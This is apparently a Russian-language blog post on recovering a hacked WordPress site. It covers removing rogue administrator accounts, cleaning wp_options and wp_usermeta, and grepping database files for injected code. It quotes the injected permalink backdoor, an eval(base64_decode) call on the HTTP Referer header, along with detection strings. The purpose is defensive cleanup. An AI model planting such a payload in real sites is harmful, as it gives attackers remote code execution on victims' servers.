Если Ваш блог:

- не отвечает, или переадресован на другой сайт;
- или ссылки блога не работают;
- или Вы заметили автора, с правами администратора, который может редактировать Ваши записи, но которого нет в списке пользователей.
- или Вы просто заподозрили что Ваш сайт пытаются взломать…

Проверьте свои таблицы на опасную инъекцию, так как Ваш блог, скорее всего, был взломан!
Опасным кодом можете считать любые скрипты содержащие eval() или base64_decode() команды, которые найдете в своих файлах или таблицах баз данных.

Что делать в этом случае:

Открываем PhpMyAdmin и идем рассматривать таблицы нашего блога, первая таблица wp_options:

• находим и удаляем запись содержащию _transient_rewrite_rules
• редактируем запись, содержащую permalink_structure, если находим ее, удаляя запись:
  &({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&

Исправить ссылки также можно в админке блога http://your-site/wp-admin/options-permalink.php, если Вы используете постоянные ссылки.

Далее, в таблице пользователей wp_users:

• ищем лишних пользователей, запоминаем их id и удаляем их,
• а в таблице wp_usermeta удаляем все записи относящиеся к user_id = id тех пользователей, которых мы удалили.

А если есть доступ по ssh, то можно поискать инъекции так:

grep -H -r “eval(base64_decode)” /var/lib/mysql
grep -H -r “var setUserName = function” /var/lib/mysql

-> Если таблицы WP заражены, результат будет следующим:

Binary file /var/lib/mysql/database1/wp_usermeta.MYD matches
Binary file /var/lib/mysql/database2/wp_usermeta.MYD matches
Binary file /var/lib/mysql/databae3/wp_usermeta.MYD matches,

Где database1..3 — это Ваши зараженные базы данных.

Затем, из phpMyAdmin, найдите строки “var setUserName = function” во всех зараженных таблицах и удалите их!

Надеюсь это Вам поможет исправить последствия взлома!

p.s. Почему такой взлом стал возможен — разберем в следующем выпуске и закроем уязвимости